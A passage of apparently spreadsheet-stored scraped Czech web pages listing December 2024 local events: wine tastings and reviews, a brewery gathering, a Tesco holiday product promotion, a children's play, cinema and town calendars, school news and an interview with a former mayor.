    <t>20241201_336_3473464923_6e83f2c16727285c73e1.html</t>
  </si>
  <si>
    <t>6e83f2c16727285c73e1</t>
  </si>
  <si>
    <t>Turné KRÁLE VÍN Tábor (Vinařské akce, Soutěže &amp;amp; Výstavy vín)</t>
  </si>
  <si>
    <t>Turné KRÁLE VÍN Tábor (Vinařské akce, Soutěže &amp;amp; Výstavy vín) /100 6. 7. 2024 „Nejprve třešně i višně, příjemný sud, příjemné tříslo, koření, bylinky. A za pár minut? Borůvky, brusinky, ostružiny, tabák, koření. A chuť? Příjemně nasládla, hořce kořenitá, bobulově ovocná, višňová s vyšší kyselinkou. S nižším alkoholem tolik perfektnosti. Výborná Frankovka. 10/2024 - 86+b.“ /100 1. 12. 2024 „Transparentní zlatožlutá barva se zářivě žlutými odlesky a výraznou viskozitou. Čistá, jemná, středně intenzivní, minerálně zemitá vůně, pojí aroma lipového květu a medu, s tóny marmelád z letního ovoce, s lehkým dotykem koření, v pozadí i s limetkou. Výraznější a plnější, bohatá, čistá, svěží, lehce nasládlá chuť dokonale harmonizuje s vůní, vytváří nádhernou kompozici sladkých tónů ovocných marmelád z buketu, živé kyselinky a pevné minerální struktury, obohacené o jemnou kořenitost. Velmi dlouhý, šťavnatý závěr.“ Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20241201_337_3473464925_e7c37d0c0cdb6bfc1083.html</t>
  </si>
  <si>
    <t>e7c37d0c0cdb6bfc1083</t>
  </si>
  <si>
    <t>Workshop s národní sommelierkou – Čechy &amp;amp; šumivá a perlivá vína (Vinařské akce, Ostatní)</t>
  </si>
  <si>
    <t>Workshop s národní sommelierkou – Čechy &amp;amp; šumivá a perlivá vína (Vinařské akce, Ostatní) Workshop s národní sommelierkou – Čechy &amp;amp; šumivá a perlivá vína Datum Vinárna Kraus, Palackého 137 [ mapa ] Popis Interaktivní pracovní formát setkávání vinařů zaměřený tentokrát na srovnání zahraničních a lokálních šumivých a perlivých vín vyrobených technologií charmat případně dosycených CO2. Workshop trvá od 17.30 do 20.30 hod. Záznamy 1–5 z 661 Tip na víno ke koupi u vinaře /100 13. 3. 2024 „Díky šťavnaté kyselině na mě nepůsobilo tak sladce, jak jsem si myslela, že bude. To jsem ocenila. Je líbivé a všeobecně přístupné. Ať žije jaro! PS: Ještě se mi líbí jen 9 % alkoholu .“ /100 24. 11. 2024 „Průzračná, medově žlutá až žlutohnědá barva s jantarovými odlesky a výraznou viskozitou. Velmi bohatá, čistá, intenzivní, plná a hutná vůně s výraznými tóny ušlechtilého dřeva použitých sudů - dubu, akátu a barique, vanilky, pražených lískových oříšků, karamelu, medu a kandovaného ananasu. Harmonická, plná, olejnatá, jemně nasládlá chuť, se znatelnou dřevitou stopou, jemným nádechem oříšků, sladkého koření, sušené hrušky a kandovaného ovoce, se sladkým tříslem, dobrou kyselinkou a příjemnými minerálními podtóny. Dlouhý ovocný závěr s jemným podtónem ušlechtilého dřeva.“ Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20241201_338_3473464428_c6d29272ad9a664f5e44.html</t>
  </si>
  <si>
    <t>c6d29272ad9a664f5e44</t>
  </si>
  <si>
    <t>Degustace vín rodinného vinařství Baláž (Vinařské akce, Degustace a ochutnávky)</t>
  </si>
  <si>
    <t>Degustace vín rodinného vinařství Baláž (Vinařské akce, Degustace a ochutnávky) Degustace vín rodinného vinařství Baláž Datum Vinotéka U Lachtana [ mapa ] Popis Po 4 letech opět ochutnáme skvělá vína dělaná se zkušeností a citem pod Pálavskými vrchy. Degustací vás provede Jiří Baláž. Seznam degustovaných vín na webových stránkách a Fb vinotéky. Nutná rezervace předem. Záznamy 1–5 z 661 Tip na víno ke koupi u vinaře /100 16. 10. 2024 „Překvapivě světlé víno se pere se sklony k líbivosti. Opatrná vyváženost připomíná Luxovi Lidovce, potěší, ale nenadchne a hlavně nepřekvapí.“ /100 23. 6. 2024 „Velmi krásná a příjemná, výrazná, rubínově červená barva, se širším světlejším meniskem a velmi dobrou viskozitou. Výraznější, čistá, intenzivnější, lehce kořenitá vůně, ohromí dokonalým propojením ušlechtilého dřeva s tóny peckovin, připomínajících sušené švestky a višně. Plnější, velmi dobře strukturovaná, příjemně svěží chuť, s tóninou švestek a višní, pikantními kořenitými podtóny, stopou dřeva, sametovým hebkým tříslem a jemnou kyselinkou. Delší, příjemně kořenitý ovocný závěr, s lehkým dotykem čokolády.“ /100 11. 11. 2023 „Míchání na kvasnicích ve velkém 1000 l starším dubovém sudu, zrání na nových barikových sudech. Kyselina jablečná odbourána samovolně. Burgundský styl, máslo, krémovost, karamel...ještě běh na dlouhou trať, za mě moc výrazný sud.“ Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20241201_339_3473462244_d8c46fcaa92a99a400d5.html</t>
  </si>
  <si>
    <t>d8c46fcaa92a99a400d5</t>
  </si>
  <si>
    <t>Předvánoční pivovarské posezení v Břevnově</t>
  </si>
  <si>
    <t>Předvánoční pivovarské posezení v Břevnově 10.12.2024 Břevnovský klášterní pivovar sv. Vojtěcha Markétská 28/1 - Praha Datum / čas Date(s) - 10.12.2024 18:30 - 21:30 Místo konání Břevnovský klášterní pivovar sv. Vojtěcha Kategorie Nebojte, ani letos vás neochudíme o setkání s námi. Pište si do diářů úterý 10. prosince. Novinky: Minipivovar Paličák Palačov El Ňiňo - vánoční pivo . Světlá patnáctka, spodně kvašená, připravená z bohaté směsi šesti druhů sladu, což ji dodává plnou a jemně sladovou chuť. on 08/12/2024 Minipivovar Křikloun Hodonín Wai-iti APA 13. Světlý ejlík se střední hořkostí a ovocno-květinovou chutí s fantasticky svěžím broskvovo-meruňkovým aromatem, který je postaven na novozélandském chmelu. on 08/12/2024 Minipivovar Novosad Harrachov Vánoční světlý speciál 14. on 08/12/2024 Pivovar Spojovna Praha Kunratický Vánočák - 18 strong ale. on 08/12/2024 Šumavský pivovar Vimperk</t>
  </si>
  <si>
    <t>20241201_34_3478701330_8ca60bed45899e368243.html</t>
  </si>
  <si>
    <t>8ca60bed45899e368243</t>
  </si>
  <si>
    <t>Vánoce a Silvestr s chutí luxusu: Tesco Finest přináší sváteční delikatesy pro každý stůl</t>
  </si>
  <si>
    <t>Vánoce a Silvestr s chutí luxusu: Tesco Finest přináší sváteční delikatesy pro každý stůl Pro vytvoření dokonalé sváteční pohody a slavnostního vánočního i silvestrovského pohoštění jsou ideální volbou produkty z prémiové řady Tesco Finest. Tato řada zahrnuje širokou škálu čerstvých i trvanlivých potravin, včetně sýrů, uzenin, vín, pečiva, tapas, mražených potravin, ovoce, zeleniny, sladkostí, slaných snacků, kávy a džemů. „Produkty Tesco Finest cílí na zákazníky, kteří si rádi dopřejí to nejlepší. Věříme ale, že si každý zaslouží občas něco výjimečného. Tato řada vyniká vysokou kvalitou a zároveň skvělým poměrem ceny a hodnoty, takže prémiové zážitky jsou dostupné pro každého. I běžné dny tak mohou být plné nezapomenutelných chutí,“ uvádí Pavol Halász, produktový ředitel Tesco ČR Vánoční kolekce plná novinek Tesco aktuálně nabízí 220 produktů pod značkou Tesco Finest, z toho 60 položek je speciálně vyhrazeno vánoční sezóně. Letos byla kolekce významně rozšířena, zejména o sladkosti a slané pochoutky. Mezi nové přírůstky patří například prémiové džemy, javorový sirup, vysoce kvalitní oleje, sušenky a originální snacky. Vedle toho řadu pochutin nejen na svátky zákazníci nakoupí pod vlastní značkou Tesco . „Obliba privátních značek dlouhodobě roste nejen v Tesco , ale na celém trhu, neboť pro zákazníky přestavují tyto produkty skvělý poměr ceny a kvality,“ doplňuje Pavol Halász. Lahůdky, které povýší vaši sváteční tabuli na nezapomenutelný zážitek Prémiová kolekce z řady Tesco Finest zahrnuje lahodné sýry, jako je intenzivní čedar s lanýži, jemně pikantní gorgonzola či kozí sýr s karamelovými tóny. Z masa a uzenin zaujme hovězí carpaccio sušené na úpatí Alp, španělská šunka Serrano nebo italská antipasta s Prosciuttem di Parma a pikantním salámem. Milovníci tapas ocení výběr oliv s chilli marinádou nebo chorizo s Manchegem, zatímco sladké chutě potěší zázvorové sušenky polité hořkou čokoládou, vánoční čokoládové bonbony či ikonické italské panettone. Nabídku doplňují křupavé sýrové tyčinky a ručně solený losos pro nezapomenutelný zážitek u slavnostní tabule. Vybrané produkty z řady Tesco Finest: Panettone – autentické, sladké a máslové italské pečivo s kandovanou citrusovou kůrou a rozinkami. Čedar s lanýži – intenzivní a chuťově výrazný Coastal® Bite Cheddar s lanýžem. Kozí sýr – uzrálý v jeskyních Wookey Hole v Somersetu . Zemitý a ořechový, lahodně jemný, pikantní pevný sýr s bohatou chutí a karamelovými vrchními tóny. Gorgonzola – kořeněný až pikantní sýr tradičně vyráběný v srdci severní Itálie . Brie – chuťově bohatý sýr Petit Triple Créme Brie s jemnou smetanovou chutí. Lelcester – sýr zrající více než 16 měsíců. Komplexní směs sladkých a slaných výrazných chutí s ořechovým podtónem. Sýr s bohatou červenohnědou barvou, který překvapí svou výraznou křupavostí a jedinečným drsným pocitem v ústech. Jeho textura je plná kontrastů, kde se každé sousto rozplývá a zároveň poskytuje příjemný, lehce rustikální zážitek. Středomořské tapas – španělské tapas s Jamón Serrano (TSG) s máslovým sýrem Manchego a na tenké plátky nakrájeným Chorizem extra. Ideální v kombinaci s červeným vínem Rioja Antipasta výběr oliv – řecká Kalamata a zelené olivy v bylinkové marinádě, zelené olivy odrůdy Chalkidikis v chilli marinádě a zelené olivy odrůdy Chalkidikis plněné česnekem. Hovězí carpaccio –hovězí maso sušené na úpatí Alp po dobu minimálně 28 dní. Dokonale se kombinuje se sýrem Parmigiano Reggian (DOP) a 11% extra panenským olivovým olejem. Šunka Serrano – hladké a jemné lomo, španělská šunka Serrano, sušená a zrající na kosti pro sladkou chuť, a bohaté chorizo, dokonale vyzrálé a plné chuti. Uzeniny na prkénko – chutné mini salámy s lanýži, prosciutto s lanýži, Coppa a jemný salám Milano , doplněné italským sýrem, olivami a sušenkami s extra panenským olivovým olejem (7%). Italská antipasta – výběr Prosciutto di Parma , Coppa, Salami Milano and Salami Spianata Piccante. Sýrové sušenky – výběr čtyř výjimečných sušenek pro ty nejkvalitnější sýry. Zázvorové sušenky polité hořkou čokoládou Karamelové sušenky Vánoční čokoládové bonbony – směs vánočních salonek v mléčné čokoládě. Mléčná čokoláda plněná medovo-pomerančovým krémem a perníkovým krémem z bílé čokolády. Vánoční čokoládové bonbony –směs vánočních salonek v hořké čokoládě. Marcipánové salonky plněné třešňovým, švestkovým a pomerančovým krémem. Lehké a křupavé tyčinky z listového těsta s extra vyzrálým polotučným tvrdým sýrem Gouda. Lehké a křupavé tyčinky z listového těsta s vyzrálým sýrem Parmigiano Reggiano a česnekem. Máslové sušenky z listového těsta s 9 měsíců vyzrálým polotučným tvrdým sýrem Gouda . Ručně solený losos Wild Sockey tradičně uzený za studena pro lehkou a jemnou chuť Vybrané produkty z řady Tesco : Pražená jádra kešu ořechů v cukru Mrazem sušený černý rybíz v bílé čokoládě a malinovém prášku Pražená jádra mandlí v bílé čokoládě se slaným karamelem a skořicí Jádra pekanových ořechů v mléčné čokoládě Směs pražených lískových ořechů a mandlí v bílé, hořké a mléčné čokoládě Kolekce máslových sušenek: Výběr máslového křehkého máslového pečiva vyrobeného ve Skotsku . V balení jsou i máslové sušenky s čokoládou a sušenky se slaným karamelem. Zlaté a křupavé solené preclíky posypané mořskou solí Jemné pečivo z kynutého těsta s rozinkami a kandovanou pomerančovou kůrou Pšenično-bramborové preclíky s příchutí zakysané smetany a pažitky obchod potraviny na trhu Vánoce Autor: red</t>
  </si>
  <si>
    <t>20241201_340_3473462976_473aba8deac660a420fe.html</t>
  </si>
  <si>
    <t>473aba8deac660a420fe</t>
  </si>
  <si>
    <t>Maxipes Fík</t>
  </si>
  <si>
    <t>Maxipes Fík Divadlo KRAPET Praha Podle literární předlohy Rudolfa Čechury a Jiřího Šalamouna . Tatí, já byfem chtěla pfa.'' řekla Ája. Tak jí tatínek koupil psa. “Jmenuje se Rek'' oznámil. A protože Ája neuměla říkat R, říkala mu Fek. „To už mu můžeme říkat Fík“ řekl tatínek. No a tak to všechno začalo. Z malého pejska vyrostl velký pes Fík a z malého dobrodružství začalo velké. A že je to pes neobyčejný? No, který pes se dostane až do školy, kde se naučí psát a počítat? Nebo dojde páníčkovi pro pivo , dostane angažmá v cirkusu? Viděli jste někdy psa, který řídí auto? Dokonce se vydá do světa skoro až na kraj světa a objeví spoustu věcí a potká spoustu lidí a má po celém světě kamarády, protože s Fíkem zažije každý moc legrace. Ale jak se říká všude dobře doma nejlíp. Moc rád se vrátí domů a zdají se mu velice divoké psí sny, dokonce i o Vánocích. Jak to všechno s Fíkem bylo? To se uvidí! „Tak neváhejte a přijďte. Bude psina! Haf!“ Autor: Zdeněk Tomeš, Michaela Sajlerová Režie: Zdeněk Tomeš, Michaela Sajlerová Hrají: Zdeněk Tomeš, Michaela Sajlerová/Veronika Koloušková, Kryštof Nohýnek / Václav Krátký, Patrik Vojtíšek/ Václav Rašilov Pohádka je vhodná pro děti od 4 let. Délka představení: cca 60 minut bez přestávky. Městské divadlo Český Krumlov Autor: Michaela Sajlerová, Zdeněk Tomeš, Jaroslav Berit, Lubor Mrázek Autoři person Michaela Sajlerová person Zdeněk Tomeš person Jaroslav Berit person Lubor Mrázek</t>
  </si>
  <si>
    <t>20241201_341_3473470846_e97656a7cb48725faea9.html</t>
  </si>
  <si>
    <t>e97656a7cb48725faea9</t>
  </si>
  <si>
    <t>20241201_342_3473472302_44bc2e54a22fbdf7cc39.html</t>
  </si>
  <si>
    <t>44bc2e54a22fbdf7cc39</t>
  </si>
  <si>
    <t>KALENDÁR ˇ AKCÍ KINO 1. PROSINCE, 10:00 DOPOLEDNÍ PROMÍTÁNÍ PYŠNÁ PRINCEZNA 4. PROSINCE, 10:00 DOPOLEDNÍ PROMÍTÁNÍ ZÁPISNÍK ALKOHOLIČKY 4. PROSINCE, 19:00 TAJEMSTVÍ SMRTI 5. PROSINCE, 19:00 VEDLEJŠÍ POKOJ 6. PROSINCE, 20:00 VLNY 7. PROSINCE, 20:00 ČARODĚJKA 8. PROSINCE, 15:00 SOBÍK NIKO: CESTA ZA POLÁRNÍ ZÁŘÍ 11. PROSINCE, 10:00 DOPOLEDNÍ PROMÍTÁNÍ VÝJIMEČNÝ STAV 11. PROSINCE, 19:00 KONKLÁVE 12. PROSINCE, 19:00 PÁN PRSTENŮ: VÁLKA ROHIRŮ 13. PROSINCE, 20:00 LÉTO S EVŽENEM 14. PROSINCE, 20:00 TAJEMSTVÍ SMRTI 15. PROSINCE, 15:00 PYŠNÁ PRINCEZNA 18. PROSINCE, 19:00 VLNY 19. PROSINCE, 19:00 GLADIÁTOR II 20. PROSINCE, 20:00 ČARODĚJ KAJTEK 21. PROSINCE, 20:00 LÉTO S EVŽENEM 22. PROSINCE, 15:00 BOB A BOBEK VE FILMU: NA STOPĚ MRKVOJEDA 27. PROSINCE, 20:00 V DOBRÉM I ZLÉM 28. PROSINCE, 20:00 JEŽEK SONIC 3 29. PROSINCE, 15:00 PYŠNÁ PRINCEZNA 31. PROSINCE, 16:30 SILVESTROVSKÉ PROMÍTÁNÍ LÉTO S EVŽENEM DIVADLO 4. PROSINCE, 19:00, DIVADELNÍ PŘEDSTAVENÍ ŠEST TANEČNÍCH HODIN V ŠESTI TÝDNECH – NÁHRADNÍ TERMÍN 8. PROSINCE, 15:00, DIVADELNÍ PŘEDSTAVENÍ PRO DĚTI POHÁDKA O KAČENCE A RARÁŠKOVI 12. PROSINCE, 19:00, DIVADELNÍ PŘEDSTAVENÍ DUCHEM PROTI SVÉ VŮLI 19. PROSINCE, 19:00, KONCERT VÁNOČNÍ KONCERT ZÁKLADNÍ UMĚLECKÉ ŠKOLY CENTRUM NÁRUČ 3., 10. PROSINCE, 11:00, VOLNOČASOVÉ CENTRUM KONVERZACE S RODILOU MLUVČÍ 6. PROSINCE, 10:00, VOLNOČASOVÉ CENTRUM VÁNOCE V KLIDU 10. PROSINCE, 17:00, VOLNOČASOVÉ CENTRUM JAK NEVYHOŘET V PARTNERSKÉM VZTAHU S MALÝMI DĚTMI 13. PROSINCE, 17:00, SÁL ZŠ STUDENTSKÁ SEZNÁMENÍ S PORODNICÍ V MB 17. PROSINCE, VOLNOČASOVÉ CENTRUM KOSMETIKA A PEDIKÚRA 18. PROSINCE, 9:00, VOLNOČASOVÉ CENTRUM VÁNOČNÍ DÍLNA PRO KURZISTY 5. PROSINCE, 17:00 AŽ 19:00 ČERTOVÁNÍ S MIKULÁŠSKOU NADÍLKOU 10. PROSINCE, 17:15 AŽ 21:15 VEČER S DUNGEONS &amp;amp; DRAGONS 2., 9. A 16. PROSINCE, 9:00 AŽ 11:00 PONDĚLNÍ DOPOLEDNÍ HERNIČKA 3. A 10. PROSINCE, 9:0 AŽ 11:00 KLUB SLUNÍČKO 4. A 11. PROSINCE, 9:00 AŽ 11:00 MINIŠKOLKA 2 (STŘEDA) 12. PROSINCE, 9:00 AŽ 11:00 KLUB KORÁLEK 12. PROSINCE, 9:00 AŽ 11:00 DOPOLEDNÍ KERAMICKÝ KLUB 6. A 13. PROSINCE, 8:30 AŽ 11:30 MINIŠKOLKA 3 (PÁTEK) OSTATNÍ DO 28. ÚNORA 2025, NÁBYTEK HONZA ( VÍTA NEJEDLÉHO 1299) VÝSTAVA FOTOGRAFIÍ, KRESEB A GRAFIKY M. BACHOVÉ 4. A 18. PROSINCE, 15:00, ZASEDACÍ MÍSTNOST MĚSTS. ÚŘADU KONZULTACE ARCHITEKTA MĚSTA S VEŘEJNOSTÍ 10. PROSINCE, 17:30, DŮM LUDMILA, VESELÁ, NA NÁVSI 229 SCHŮZKA MNICHOVOHRADIŠŤSKÉHO SPOLKU GENEALOGŮ 16. PROSINCE, 17:00, KOMUNITNÍ CENTRUM MÍROVÁ VEŘEJNÉ ZASEDÁNÍ ZASTUPITELSTVA MĚSTA</t>
  </si>
  <si>
    <t>20241201_343_3473481482_0b7450cd59a4826d1173.html</t>
  </si>
  <si>
    <t>0b7450cd59a4826d1173</t>
  </si>
  <si>
    <t>Historie českého piva a pivovary na Berounsku a v blízkém okolí</t>
  </si>
  <si>
    <t>20241201_344_3473480506_3af109274a9386c8a322.html</t>
  </si>
  <si>
    <t>3af109274a9386c8a322</t>
  </si>
  <si>
    <t>Podzim na Základní škole a praktické škole</t>
  </si>
  <si>
    <t>Podzim na Základní škole a praktické škole Podzimní období na Základní škole a praktické škole Veselí nad Moravou bylo bohaté na události jak v prostorách školy, tak při výjezdových akcích. Bzenecký les Téměř všechny třídy vyrazily vlakem na poznávací program do lesa ve Bzenci . Žáci hledali a pojmenovávali houby, stavěli domečky pro lesní skřítky, plnili nejrůznější úkoly. V Lesní mateřské škole Petrklíč si rozdělali oheň. Společné opékání špekáčků utužilo kolektivy tříd, žáci se s pedagogy mohli poznat i v jiných situacích. Beseda s myslivci Myslivci z Mysliveckého spolku Veselí n. M. – pan Aleš Ivánek a Richard Zubatý – přivezli ukázat našim žákům spoustu zajímavých věcí, různé trofeje: kožešiny, paroží, lebky, zuby, a dokonce i vycpaná zvířata. Myslivci dětem velmi poutavou formou přiblížili život zvířat v našem okolí. Mluvili i o ochraně zvířat a o zajímavostech z jejich lovu. Strašidelná stezka Kdo se chtěl bát, mohl si projít strašidelnou stezku. Chodby a boční schodiště byly strašidelnou výzdobou změněny k nepoznání. Mohli jste zde vidět mumie, kostlivce, čarodějnice a jiné příšery. Žáci hledali kartičky s úkoly inspirovanými Halloweenem a po vyluštění tajenky si ve slizkém akváriu mohli vylovit sladkou odměnu. Čajování Tato akce umožnila dětem objevit různé druhy čajů – mátový, meduňkový, bezový, ibiškový, šípkový. V kombinaci s domácím štrúdlem a moučníkem, např. z červené řepy, máku, jablíček, navozovala úžasnou atmosféru. Děkujeme všem, kteří nám pomohli při přípravě. Díky vám jsme vytvořili dopoledne plné chutí, vůní a pohody. Jak se nestát závislákem Některé prostory naší školy se změnily na stanoviště, kde pracovnice Státního zdravotnického ústavu v Brně poutavou formou seznámily naše žáky se závislostmi – jednalo se o kouření, alkohol a drogy – a s asertivním chováním při jejich odmítání. Většina žáků se dozvěděla nové informace a hlavně si vyzkoušela, jak se bránit.</t>
  </si>
  <si>
    <t>20241201_345_3473481319_9f56805d190c39b470e6.html</t>
  </si>
  <si>
    <t>9f56805d190c39b470e6</t>
  </si>
  <si>
    <t>Vánoční jarmark na zámku</t>
  </si>
  <si>
    <t>Vánoční jarmark na zámku První adventní neděli (1. 12. od 10.00 do 16.30) se nádvoří brandýského zámku opět zaplní šikovnými tvůrci z různých koutů naší země a vy si tak budete moci za zvuku koled a vůně svařeného vína vybírat dárky pro své nejbližší. Nebudou chybět dílničky pro děti, divadélko ani skvělé občerstvení. Divadlo KaKá zahraje v 10.30 dětem Vánoční příběh, ve 14.00 začne koncert místního pěveckého sboru La Mandala.</t>
  </si>
  <si>
    <t>15700</t>
  </si>
  <si>
    <t>20241201_346_3473463628_c79ffc93e4d3906f50d8.html</t>
  </si>
  <si>
    <t>c79ffc93e4d3906f50d8</t>
  </si>
  <si>
    <t>Rozhovor s emeritním starostou města Ing. Antonínem Navrátilem</t>
  </si>
  <si>
    <t>Rozhovor s emeritním starostou města Ing. Antonínem Navrátilem Při slavnostním symbolickém odemčení nové knihovny jste byl panem starostou zmíněn v souvislosti se zadáním studie na tuto stavbu. Můžete se k tomu prosím vyjádřit? Když jsme v roce 2012 prováděli revitalizaci centra města, autor tohoto projektu Ing. arch. Burian nám doporučil, abychom se v budoucnu věnovali případné dostavbě budovy za městským úřadem, neboť to tam po demolici v 70. letech minulého století vypadá jako po vybuchlé bombě. Když jsme pak po čase toto téma otevřeli, byl jsem přesvědčen, že by bylo dobré, aby tuto dostavbu navrhoval právě pan architekt Burian, protože s ním má město vynikající zkušenost. V tomto směru se k mému názoru přiklonili i ostatní radní města. A záměr, aby v této budově byla knihovna, vznikl kdy? Jak víte, když jsem pracoval ve vedení města, měl jsem na starosti mj. také kulturu, potažmo Dům kultury, pod který tehdy spadala i městská knihovna. Vědom si toho, že je knihovna v nevyhovujících prostorách, snažili jsme se s tehdejším místostarostou Pavlem Kubou najít jiný vhodný prostor pro její umístění. Obzvláště, když jsme měli budovu knihovny pronajatou, neboť dům na ulici S. K. Neumanna městu nepatřil. Proto jsme přišli s návrhem, aby v této nové budově byla i městská knihovna. Bylo to těžké prosadit? Poměrně ano, ale teď, když již novou knihovnu máme, bych chtěl spíše poděkovat několika zastupitelstvům, která nesla tento projekt dále napříč několika volebními obdobími. No a když si uvědomíme, s jakými složitostmi se potýkala výstavba nové knihovny, chtěl bych vyzdvihnout zejména zásluhy pana starosty Pavla Kuby. Díky jeho, řekl bych až zarputilosti, dotáhnout projekt do konce, zde knihovna stojí. V určité fázi rozestavěnosti, kdy první stavební firma nebyla schopna s výstavbou pokračovat, se totiž objevovaly názory, aby se „ta díra zavezla hlínou“ a ve výstavbě se nepokračovalo, neboť jsou jiné důležitější věci k realizaci. A byly nebo jsou dle vašeho názoru jiné důležitější věci, které mělo město realizovat? Z mého pohledu je nová knihovna nesmírně důležitou stavbou zejména pro děti a mládež. Jsem přesvědčen, že tak atraktivní a důstojný prostor přiláká nové čtenáře, a to i ty nejmenší, obdobně jako je tomu v oblasti sportu u nově zrekonstruovaných sportovišť. V této souvislosti, když mám tuto možnost, bych rád jako občan města vyjádřil velké poděkování za nový skatepark na ulici 1. máje. Fandím rovněž záměru města vystavět novou ledovou plochu nebo lépe řečeno multifunkční sportovní halu za krytým bazénem. Na to ale panují mezi zastupiteli rozdílné názory. Ano sleduji to. Ačkoli neznám ekonomiku provozu plánovaného zařízení a přesné náklady na jeho výstavbu, málo se zdůrazňuje fakt, že výstavba ledové plochy má velkou přidanou hodnotu ve využití volného času dětí a mládeže. Když společnost, potažmo město nemá mladým lidem co nabídnout, často sáhnou po alkoholu nebo drogách. To jistě nechceme. Rozšíření možností pro vyžití dětí a mládeže má tedy u mě na té pomyslné misce vah „pro a proti“ váhu největší. Ale kde má město vzít peníze na tak nákladný projekt? Zaznamenal jsem diskusi zastupitelů města, že by se měla rekonstruovat chata základní školy Mlýnská v Moravském Karlově , a to v řádu desítek milionů korun. Z mého pohledu tato chata měla v minulosti svůj význam, když např. probíhaly povinné školní lyžařské kurzy, ale nyní jej již nemá, když má projít tak nákladnou rekonstrukcí a má sloužit jen jedné škole. Vytvořilo by to mj. značnou nerovnováhu mezi našimi školami. Chatu bych navrhl odprodat, získané finanční prostředky bych dal k dispozici škole Mlýnská pro další modernizaci a za „uspořené“ desítky milionů korun bych vystavěl tuto ledovou plochu, která bude sloužit podstatně větší skupině našich občanů. Autor: -mn- Autor person mn</t>
  </si>
  <si>
    <t>4400</t>
  </si>
  <si>
    <t>20241201_347_3473464656_556e5f78d0ae0f8acc68.html</t>
  </si>
  <si>
    <t>556e5f78d0ae0f8acc68</t>
  </si>
  <si>
    <t>KALENDÁŘ AKCÍ Pondělí 18. 11. 2024 – neděle 12. 1. 2025 Zachumelené betlémy Rovná 352, Ořech Od 18. listopadu do 12. ledna 2025 bude výstava betlémů otevřena každý víkend od 10.00 do 18.00 a na objednávku pro skupiny i v jiných, předem domluvených termínech. Jak název Zachumelené betlémy napovídá jsou pro letošní výstavu vybrány betlémy na téma Děti a sníh. Do 8. prosince bude k vidění i velký mechanický Jubilejní betlém, který se pak přestěhuje na velkou výstavu do Břevnovského kláštera. Více na www.muzeumceskychvanoc.cz. Pondělí 18. 11. – pátek 6. 12. Výstava fotografií Pavla Drdela Atrium radnice MČ Praha 13, Sluneční náměstí 2580/13 Výstava fotografií výjimečného fotografa, skvělého kuchaře, majitele restaurace a aktivního ambasadora charitativních a společensky prospěšných projektů. V případě zájmu o fotografie pište na e-mail: sularepastrakonice@gmail.com. Úterý 26. 11. – pondělí 23. 12. Prodej vánočních stromků Hypermarket Globus Zličín , Sárská 133/5 Prodej vánočních stromků před hypermarketem Globus. Pátek 29. 11. – středa 18. 12. Strom splněných přání Hypermarket Globus Zličín , Sárská 133/5 Pomozte nám splnit vánoční přání dětí z FOD Klokánek Hostivice a Dětského domova Nové Strašecí „Strašidýlko“. Stačí přijít ke stromu splněných přání, vybrat si kartičku s přáním a předat ji spolu se zakoupeným dárkem v informačním centru hypermarketu. Děkujeme za vaši pomoc a přejeme krásné Vánoce. Sobota 30. 11. • 9.00–13.00 Adventní výtvarná dílna ZŠ Mohylová , Mohylová 1963/2 Zveme vás na Adventní výtvarnou dílnu. Přijďte se naladit vánoční atmosférou do naší školy, kde si můžete vyrobit adventní věnce, svícny, dekorace. Děti si mohou ozdobit různé druhy svíček, nazdobit perníčky nebo připravit dárečky pod stromeček. Přineste si jen ostrý nůž nebo nůžky, další výrobní materiál dostanete na místě. Pro hladové nebo upracované bude připravena kavárna a výborný guláš nebo chlebíčky, které připraví naše paní kuchařky. Těšíme se na vás! Pondělí 2. 12. • 16.00 Z předškoláčka školáčkem ZŠ Janského, Janského 2189 ZŠ Janského připravila školičku, pro všechny budoucí prvňáčky a nulťáčky. Po celý školní rok si mohou všichni vyzkoušet jaké to je chodit do velké školy, seznámí se s učiteli, poznají budoucí spolužáky, zažijí super zábavu a procvičí nejen tělo, ale i mysl. Tentokrát na téma Předškolák malířem (volnočasové a mimoškolní aktivity). Prosíme o přihlášení dítěte do školičky na e-mailu: v.ramsova@zs-janskeho.cz. Na všechny se moc těšíme v ZŠ Janského. Další termíny 7. 1., 4. 2. a 4. 3. 2025. Úterý 3. 12. • 14.00 Retrokavárna KD Mlejn, Kovářova 1615/4 V prosinci zpříjemní předvánoční čas v Retrokavárně duo Dobrý lidi a zazpívají duety známé i neznámé. Zájemci o prosincový program Retrokavárny si mohou rezervovat místo u paní Zuzany Kraljové na tel. 235 011 451. Úterý 3. 12. • 17.00–17.30 Vánoční vystoupení studia Mirabel Staroměstské náměstí , Praha 1 Taneční studio Mirabel zve všechny příznivce, rodiče i milovníky irského tance na Vánoční vystoupení. Středa 4. 12. • 10.00–18.00 Vánoční jarmark Obřadní síň a atrium radnice MČ Praha 13, Sluneční náměstí 2580/13 Městská část Praha 13 si vás srdečně dovoluje pozvat na 5. ročník Vánočního jarmarku. Přijďte si s námi užít předvánoční čas, potěšit se krásnými věcmi a naladit se na kouzelnou vánoční atmosféru. Středy 4. a 11. 12. • 16.00 Podzimní školička v Mohylce ZŠ Mohylová , Mohylová 1963/2 Podzimní školička pro budoucí prvňáčky má usnadnit dětem přestup ze školky do školy a rodičům nabízí informace o naší škole, ukázkové hodiny Matematiky Hejného, čtení genetickou metodou s prvky kritického myšlení. Do kurzu se nemusíte předem hlásit. Čtvrtek 5. 12. • 15.00–18.00 Globus Zličín Hypermarket Globus Zličín , Sárská 133/5 Navštíví nás Mikuláš s čertem a andělem. Pro všechny hodné děti bude mít za písničku nebo básničku v košíku nějakou sladkost. Čtvrtek 5. 12. • 17.00 Andělský průvod s Mikulášskou nadílkou Začátek i konec před KD Mlejn, Kovářova 1615/4 Tradiční Mikuláš ve Mlejně bude mít letos podobu Andělského průvodu s Divadlem KVELB a Lučinkou. Pojďte s dětmi s námi, vytvoříme průvod světel. Připojit se můžete zdarma, ale pokud zakoupíte pro děti vstupenku za 150 Kč, dostanou před průvodem lampionek se světýlkem a na konci průvodu drobnou mikulášskou nadílku. Pátek 6. 12. • 17.30 Čertovská stezka v Centrálním parku U Stodůleckého rybníka v Centrálním parku Sportklub Bessie pořádá Čertovskou stezku odvahy. Start bude u Stodůleckého rybníka v Centrálním parku. Děti budou muset projít stezku a v pekle dostanou výsluhu. Pouze pro přihlášené předem na webové adrese https://sportklub-praha13.cz/mikulas/. Cena za dítě: 50 Kč (vlastní balíčky)/100 Kč (připravené balíčky). Sobota 7. 12. • 10.00 